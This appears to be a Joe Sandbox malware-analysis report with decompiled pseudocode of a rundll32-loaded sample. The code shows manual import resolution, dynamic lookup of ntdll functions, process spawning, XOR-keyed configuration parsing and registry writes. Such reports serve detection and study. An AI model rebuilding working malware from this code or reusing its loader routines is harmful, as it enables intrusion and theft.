                                          				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                                          				_a4 = _t57;
                                          				if(_t36 == 0) {
                                          					L27:
                                          					goto L28;
                                          				}
                                          				while(1) {
                                          					_t62 = _t36 + _t52;
                                          					_t37 = LoadLibraryA(_t62);
                                          					_v16 = _t37;
                                          					if(_t37 == 0) {
                                          						break;
                                          					}
                                          					_v12 = _v12 & 0x00000000;
                                          					memset(_t62, 0, lstrlenA(_t62));
                                          					_t53 =  *_t57;
                                          					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                                          					_t65 = _t65 + 0xc;
                                          					if(_t53 != 0) {
                                          						L6:
                                          						_t64 = _t53 + _t52;
                                          						_t54 =  *_t64;
                                          						if(_t54 == 0) {
                                          							L23:
                                          							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                                          							_t57 = _t57 + 0x14;
                                          							_a4 = _t57;
                                          							if(_t36 != 0) {
                                          								continue;
                                          							}
                                          							L26:
                                          							goto L27;
                                          						}
                                          						_v20 = _t40 - _t64 + _t52;
                                          						_t72 = _t54;
                                          						L8:
                                          						L8:
                                          						if(_t72 < 0) {
                                          							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                                          								_t59 = 0;
                                          								_v12 =  *_t64 & 0x0000ffff;
                                          							} else {
                                          								_t59 = _t54;
                                          							}
                                          						} else {
                                          							_t59 = _t54 + _t52;
                                          						}
                                          						_t20 = _t59 + 2; // 0x2
                                          						_t44 = _t20;
                                          						if(_t59 == 0) {
                                          							_t44 = _v12 & 0x0000ffff;
                                          						}
                                          						_t45 = GetProcAddress(_v16, _t44);
                                          						_v24 = _t45;
                                          						if(_t45 == 0) {
                                          							goto L21;
                                          						}
                                          						if(_t59 != 0) {
                                          							_t60 = _t59 + 2;
                                          							memset(_t60, 0, lstrlenA(_t60));
                                          							_t65 = _t65 + 0xc;
                                          						}
                                          						 *(_v20 + _t64) = _v24;
                                          						_t64 =  &(_t64[2]);
                                          						_t54 =  *_t64;
                                          						if(_t54 != 0) {
                                          							goto L8;
                                          						} else {
                                          							L22:
                                          							_t57 = _a4;
                                          							goto L23;
                                          						}
                                          						L21:
                                          						_v8 = 0x7f;
                                          						goto L22;
                                          					}
                                          					_t53 = _t40;
                                          					if(_t40 == 0) {
                                          						goto L23;
                                          					}
                                          					goto L6;
                                          				}
                                          				_v8 = 0x7e;
                                          				goto L26;
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemset$AddressLibraryLoadProc
                                          • String ID: ~
                                          • API String ID: 1986585659-1707062198
                                          • Opcode ID: a5954790d0c361c0c0f714926053e0664c8e4c51bceab332145a0c26e5ee4ff6
                                          • Instruction ID: 0dbdc59b930664e4b39991f94961cec4c493214da5eb40e0cf7fc9ec9d432edd
                                          • Opcode Fuzzy Hash: a5954790d0c361c0c0f714926053e0664c8e4c51bceab332145a0c26e5ee4ff6
                                          • Instruction Fuzzy Hash: 9731C5B5A00A16DBEF10CF15C894BEEBBB4BF54340F2541ADEA05DB600D731EA85CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E04081493(void* __eax, void* __ecx) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				long _v32;
                                          				void _v104;
                                          				char _v108;
                                          				long _t36;
                                          				intOrPtr _t39;
                                          				intOrPtr _t46;
                                          				intOrPtr _t49;
                                          				void* _t57;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t69;
                                          
                                          				_t1 = __eax + 0x14; // 0x74183966
                                          				_t67 =  *_t1;
                                          				_t36 = E040857D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					L12:
                                          					return _v8;
                                          				}
                                          				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                          				_t39 = _v12(_v12);
                                          				_v8 = _t39;
                                          				if(_t39 == 0 && ( *0x408d260 & 0x00000001) != 0) {
                                          					_v32 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v108 = 0;
                                          					memset( &_v104, 0, 0x40);
                                          					_t46 =  *0x408d2a4; // 0xbfa5a8
                                          					_t18 = _t46 + 0x408e3e6; // 0x73797325
                                          					_t66 = E040877E6(_t18);
                                          					if(_t66 == 0) {
                                          						_v8 = 8;
                                          					} else {
                                          						_t49 =  *0x408d2a4; // 0xbfa5a8
                                          						_t19 = _t49 + 0x408e747; // 0x4c88cef
                                          						_t20 = _t49 + 0x408e0af; // 0x4e52454b
                                          						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                          						if(_t69 == 0) {
                                          							_v8 = 0x7f;
                                          						} else {
                                          							_v108 = 0x44;
                                          							E0408684E();
                                          							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                          							_push(1);
                                          							E0408684E();
                                          							if(_t57 == 0) {
                                          								_v8 = GetLastError();
                                          							} else {
                                          								CloseHandle(_v28);
                                          								CloseHandle(_v32);
                                          							}
                                          						}
                                          						HeapFree( *0x408d238, 0, _t66);
                                          					}
                                          				}
                                          				_t68 = _v16;
                                          				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                          				E0408147E(_t68);
                                          				goto L12;
                                          			}

                                          APIs
                                            • Part of subcall function 040857D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,040814AF,?,?,?,?,00000000,00000000), ref: 040857FD
                                            • Part of subcall function 040857D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0408581F
                                            • Part of subcall function 040857D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04085835
                                            • Part of subcall function 040857D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0408584B
                                            • Part of subcall function 040857D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04085861
                                            • Part of subcall function 040857D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04085877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 040814C5
                                          • memset.NTDLL ref: 04081500
                                            • Part of subcall function 040877E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0408333A,73797325), ref: 040877F7
                                            • Part of subcall function 040877E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04087811
                                          • GetModuleHandleA.KERNEL32(4E52454B,04C88CEF,73797325), ref: 04081536
                                          • GetProcAddress.KERNEL32(00000000), ref: 0408153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 040815A5
                                            • Part of subcall function 0408684E: GetProcAddress.KERNEL32(36776F57,0408935F), ref: 04086869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04081582
                                          • CloseHandle.KERNEL32(?), ref: 04081587
                                          • GetLastError.KERNEL32(00000001), ref: 0408158B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: e8ab326e84a6e25a14fa796f526f320e8efc8e4dc05b5c99aac422443e33ff04
                                          • Instruction ID: fcb8616c7f5b99b2e344333f92811ef7816d1791fcf6faa63d4ef567f0e267cf
                                          • Opcode Fuzzy Hash: e8ab326e84a6e25a14fa796f526f320e8efc8e4dc05b5c99aac422443e33ff04
                                          • Instruction Fuzzy Hash: 50313272800219EFEB10BFA4DE88DDEBBB8EF04354F004569E586B7150D735AE459B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E04084D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t9;
                                          				intOrPtr _t13;
                                          				char* _t28;
                                          				void* _t33;
                                          				void* _t34;
                                          				char* _t36;
                                          				intOrPtr* _t40;
                                          				char* _t41;
                                          				char* _t42;
                                          				char* _t43;
                                          
                                          				_t34 = __edx;
                                          				_push(__ecx);
                                          				_t9 =  *0x408d2a4; // 0xbfa5a8
                                          				_t1 = _t9 + 0x408e62c; // 0x253d7325
                                          				_t36 = 0;
                                          				_t28 = E04086027(__ecx, _t1);
                                          				if(_t28 != 0) {
                                          					_t40 = __imp__;
                                          					_t13 =  *_t40(_t28);
                                          					_v8 = _t13;
                                          					_t41 = E040858BE(_v8 +  *_t40(_a4) + 1);
                                          					if(_t41 != 0) {
                                          						strcpy(_t41, _t28);
                                          						_pop(_t33);
                                          						__imp__(_t41, _a4);
                                          						_t36 = E04086F33(_t34, _t41, _a8);
                                          						E0408147E(_t41);
                                          						_t42 = E04084759(StrTrimA(_t36, "="), _t36);
                                          						if(_t42 != 0) {
                                          							E0408147E(_t36);
                                          							_t36 = _t42;
                                          						}
                                          						_t43 = E04084858(_t36, _t33);
                                          						if(_t43 != 0) {
                                          							E0408147E(_t36);
                                          							_t36 = _t43;
                                          						}
                                          					}
                                          					E0408147E(_t28);
                                          				}
                                          				return _t36;
                                          			}

                                          APIs
                                            • Part of subcall function 04086027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04084D46,253D7325,00000000,00000000,74ECC740,?,?,040852FE,?), ref: 0408608E
                                            • Part of subcall function 04086027: sprintf.NTDLL ref: 040860AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,040852FE,?,04C895B0), ref: 04084D57
                                          • lstrlen.KERNEL32(?,?,?,040852FE,?,04C895B0), ref: 04084D5F
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • strcpy.NTDLL ref: 04084D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 04084D81
                                            • Part of subcall function 04086F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04084D90,00000000,?,?,?,040852FE,?,04C895B0), ref: 04086F4A
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,040852FE,?,04C895B0), ref: 04084D9E
                                            • Part of subcall function 04084759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04084DAA,00000000,?,?,040852FE,?,04C895B0), ref: 04084763
                                            • Part of subcall function 04084759: _snprintf.NTDLL ref: 040847C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 137d095f75d42917c3a58f174cacabd86b52281df0779258dbb494ee0396d68a
                                          • Instruction ID: ab14b9f74d9610a2ab056dfeca13737a4fffbe1403c8f31291ce26c28aab5f6e
                                          • Opcode Fuzzy Hash: 137d095f75d42917c3a58f174cacabd86b52281df0779258dbb494ee0396d68a
                                          • Instruction Fuzzy Hash: 001177739012297766227BB49E84CAF3AADDF456AC305451DF584BB240DB38ED0297A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E040898F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                          				int _v8;
                                          				void* _v12;
                                          				signed int _t18;
                                          				signed int _t23;
                                          				void* _t28;
                                          				char* _t29;
                                          				char* _t30;
                                          				char* _t31;
                                          				char* _t32;
                                          				char* _t33;
                                          				void* _t34;
                                          				void* _t35;
                                          				signed int _t41;
                                          				void* _t43;
                                          				void* _t44;
                                          				signed int _t46;
                                          				signed int _t50;
                                          				signed int _t54;
                                          				signed int _t58;
                                          				signed int _t62;
                                          				signed int _t66;
                                          				void* _t69;
                                          				void* _t70;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t86;
                                          
                                          				_t83 = __esi;
                                          				_t80 = __edi;
                                          				_t72 = __ecx;
                                          				_t69 = __ebx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t18 =  *0x408d2a0; // 0x59935a40
                                          				if(E040896D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                          					 *0x408d2d0 = _v12;
                                          				}
                                          				_t23 =  *0x408d2a0; // 0x59935a40
                                          				if(E040896D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                          					_t28 = 2;
                                          					return _t28;
                                          				} else {
                                          					_push(_t69);
                                          					_t70 = _v12;
                                          					_push(_t83);
                                          					_push(_t80);
                                          					if(_t70 == 0) {
                                          						_t29 = 0;
                                          					} else {
                                          						_t66 =  *0x408d2a0; // 0x59935a40
                                          						_t29 = E040810CA(_t72, _t70, _t66 ^ 0x48b4463f);
                                          					}
                                          					if(_t29 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                          							 *0x408d240 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t30 = 0;
                                          					} else {
                                          						_t62 =  *0x408d2a0; // 0x59935a40
                                          						_t30 = E040810CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                          					}
                                          					if(_t30 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                          							 *0x408d244 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t31 = 0;
                                          					} else {
                                          						_t58 =  *0x408d2a0; // 0x59935a40
                                          						_t31 = E040810CA(_t72, _t70, _t58 ^ 0x01dd0365);
                                          					}
                                          					if(_t31 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                          							 *0x408d248 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t32 = 0;
                                          					} else {
                                          						_t54 =  *0x408d2a0; // 0x59935a40
                                          						_t32 = E040810CA(_t72, _t70, _t54 ^ 0x3cf823ca);
                                          					}
                                          					if(_t32 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                          							 *0x408d004 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t33 = 0;
                                          					} else {
                                          						_t50 =  *0x408d2a0; // 0x59935a40
                                          						_t33 = E040810CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                          					}
                                          					if(_t33 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                          							 *0x408d02c = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t34 = 0;
                                          					} else {
                                          						_t46 =  *0x408d2a0; // 0x59935a40
                                          						_t34 = E040810CA(_t72, _t70, _t46 ^ 0x163b337e);
                                          					}
                                          					if(_t34 != 0) {
                                          						_push(_t34);
                                          						_t43 = 0x10;
                                          						_t44 = E0408A2EF(_t43);
                                          						if(_t44 != 0) {
                                          							_push(_t44);
                                          							E04089B10();
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t35 = 0;
                                          					} else {
                                          						_t41 =  *0x408d2a0; // 0x59935a40
                                          						_t35 = E040810CA(_t72, _t70, _t41 ^ 0x89f501b6);
                                          					}
                                          					if(_t35 != 0 && E0408A2EF(0, _t35) != 0) {
                                          						_t86 =  *0x408d324; // 0x4c895b0
                                          						E04084C3A(_t86 + 4, _t39);
                                          					}
                                          					HeapFree( *0x408d238, 0, _t70);
                                          					return 0;
                                          				}
                                          			}

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 0408997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 040899AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 040899DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 04089A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 04089A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 04089AC3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 0ec3c2c60f88d9be23753675f9f05d9a9a46db44324d83cb1fe1f5b25abbd25f
                                          • Instruction ID: 02b014d6398bd0210ae26e267ad3dab83c2e63b815ed49eb6f1665490424e0d5
                                          • Opcode Fuzzy Hash: 0ec3c2c60f88d9be23753675f9f05d9a9a46db44324d83cb1fe1f5b25abbd25f
                                          • Instruction Fuzzy Hash: 93516EB0700114EEE750FBB89F84DAB76EDEB987147640A2DA4C1F7144E679F9418A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 040813B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 040813C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 040813DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 04081443
                                          • SysFreeString.OLEAUT32(00000000), ref: 04081452
                                          • SysFreeString.OLEAUT32(00000000), ref: 0408145D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 16983a597ae934a4ab5a70cac69b04878deb591bad0a8b6fd74eb272c9f1c1ec
                                          • Instruction ID: e697ec745377577bc687691521485fbae6728c080a56222c017eebbe65abaca7
                                          • Opcode Fuzzy Hash: 16983a597ae934a4ab5a70cac69b04878deb591bad0a8b6fd74eb272c9f1c1ec
                                          • Instruction Fuzzy Hash: A1417F36900609AFDB41EFF8D944ADEB7BAEF49300F104429E954FB250DA75ED06CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E040857D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t23;
                                          				intOrPtr _t26;
                                          				_Unknown_base(*)()* _t28;
                                          				intOrPtr _t30;
                                          				_Unknown_base(*)()* _t32;
                                          				intOrPtr _t33;
                                          				_Unknown_base(*)()* _t35;
                                          				intOrPtr _t36;
                                          				_Unknown_base(*)()* _t38;
                                          				intOrPtr _t39;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E040858BE(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t23 =  *0x408d2a4; // 0xbfa5a8
                                          					_t1 = _t23 + 0x408e11a; // 0x4c44544e
                                          					_t48 = GetModuleHandleA(_t1);
                                          					_t26 =  *0x408d2a4; // 0xbfa5a8
                                          					_t2 = _t26 + 0x408e769; // 0x7243775a
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48, _t2);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E0408147E(_t54);
                                          					} else {
                                          						_t30 =  *0x408d2a4; // 0xbfa5a8
                                          						_t5 = _t30 + 0x408e756; // 0x614d775a
                                          						_t32 = GetProcAddress(_t48, _t5);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t33 =  *0x408d2a4; // 0xbfa5a8
                                          							_t7 = _t33 + 0x408e40b; // 0x6e55775a
                                          							_t35 = GetProcAddress(_t48, _t7);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t36 =  *0x408d2a4; // 0xbfa5a8
                                          								_t9 = _t36 + 0x408e4d2; // 0x4e6c7452
                                          								_t38 = GetProcAddress(_t48, _t9);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t39 =  *0x408d2a4; // 0xbfa5a8
                                          									_t11 = _t39 + 0x408e779; // 0x6c43775a
                                          									_t41 = GetProcAddress(_t48, _t11);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E04087B01(_t54, _a8);
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}


















                                          APIs
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,040814AF,?,?,?,?,00000000,00000000), ref: 040857FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0408581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04085835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0408584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04085861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04085877
                                            • Part of subcall function 04087B01: memset.NTDLL ref: 04087B80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 66a0e717567886b575df735c8a557f5af207af322562a4be17013d9d7626ed60
                                          • Instruction ID: 280ec648e64658234e7ff31bfbc8fa0b652a08c9f0f7a6695d277f15c14736bd
                                          • Opcode Fuzzy Hash: 66a0e717567886b575df735c8a557f5af207af322562a4be17013d9d7626ed60
                                          • Instruction Fuzzy Hash: F9214FB060061AEFEB11EF69CE44D5A77EDEF54304704452EE988FB250EB78E9058B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E0408A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                          				signed int _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				void _v284;
                                          				void* __esi;
                                          				char* _t60;
                                          				intOrPtr* _t61;
                                          				intOrPtr _t65;
                                          				char _t68;
                                          				intOrPtr _t72;
                                          				void* _t73;
                                          				intOrPtr _t75;
                                          				void* _t78;
                                          				void* _t88;
                                          				void* _t96;
                                          				void* _t97;
                                          				int _t102;
                                          				signed int* _t104;
                                          				intOrPtr* _t105;
                                          				void* _t106;
                                          
                                          				_t97 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t102 = _a16;
                                          				if(_t102 == 0) {
                                          					__imp__( &_v284,  *0x408d33c);
                                          					_t96 = 0x80000002;
                                          					L6:
                                          					_t60 = E0408A5E9(0,  &_v284);
                                          					_a8 = _t60;
                                          					if(_t60 == 0) {
                                          						_v8 = 8;
                                          						L29:
                                          						_t61 = _a20;
                                          						if(_t61 != 0) {
                                          							 *_t61 =  *_t61 + 1;
                                          						}
                                          						return _v8;
                                          					}
                                          					_t105 = _a24;
                                          					if(E0408621D(_t97, _t105, _t96, _t60) != 0) {
                                          						L27:
                                          						E0408147E(_a8);
                                          						goto L29;
                                          					}
                                          					_t65 =  *0x408d2a4; // 0xbfa5a8
                                          					_t16 = _t65 + 0x408e8de; // 0x65696c43
                                          					_t68 = E0408A5E9(0, _t16);
                                          					_a24 = _t68;
                                          					if(_t68 == 0) {
                                          						L14:
                                          						_t29 = _t105 + 0x14; // 0x102
                                          						_t33 = _t105 + 0x10; // 0x3d0408c0
                                          						if(E04084C9A( *_t33, _t96, _a8,  *0x408d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                          							_t72 =  *0x408d2a4; // 0xbfa5a8
                                          							if(_t102 == 0) {
                                          								_t35 = _t72 + 0x408ea54; // 0x4d4c4b48
                                          								_t73 = _t35;
                                          							} else {
                                          								_t34 = _t72 + 0x408ea4f; // 0x55434b48
                                          								_t73 = _t34;
                                          							}
                                          							if(E040830FC( &_a24, _t73,  *0x408d334,  *0x408d338,  &_a24,  &_a16) == 0) {
                                          								if(_t102 == 0) {
                                          									_t75 =  *0x408d2a4; // 0xbfa5a8
                                          									_t44 = _t75 + 0x408e856; // 0x74666f53
                                          									_t78 = E0408A5E9(0, _t44);
                                          									_t103 = _t78;
                                          									if(_t78 == 0) {
                                          										_v8 = 8;
                                          									} else {
                                          										_t47 = _t105 + 0x10; // 0x3d0408c0
                                          										E04081BC1( *_t47, _t96, _a8,  *0x408d338, _a24);
                                          										_t49 = _t105 + 0x10; // 0x3d0408c0
                                          										E04081BC1( *_t49, _t96, _t103,  *0x408d330, _a16);
                                          										E0408147E(_t103);
                                          									}
                                          								} else {
                                          									_t40 = _t105 + 0x10; // 0x3d0408c0
                                          									E04081BC1( *_t40, _t96, _a8,  *0x408d338, _a24);
                                          									_t43 = _t105 + 0x10; // 0x3d0408c0
                                          									E04081BC1( *_t43, _t96, _a8,  *0x408d330, _a16);
                                          								}
                                          								if( *_t105 != 0) {
                                          									E0408147E(_a24);
                                          								} else {
                                          									 *_t105 = _a16;
                                          								}
                                          							}
                                          						}
                                          						goto L27;
                                          					}
                                          					_t21 = _t105 + 0x10; // 0x3d0408c0
                                          					if(E040874B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                          						_t104 = _v16;
                                          						_t88 = 0x28;
                                          						if(_v12 == _t88) {
                                          							 *_t104 =  *_t104 & 0x00000000;
                                          							_t26 = _t105 + 0x10; // 0x3d0408c0
                                          							E04084C9A( *_t26, _t96, _a8, _a24, _t104);
                                          						}
                                          						E0408147E(_t104);
                                          						_t102 = _a16;
                                          					}
                                          					E0408147E(_a24);
                                          					goto L14;
                                          				}
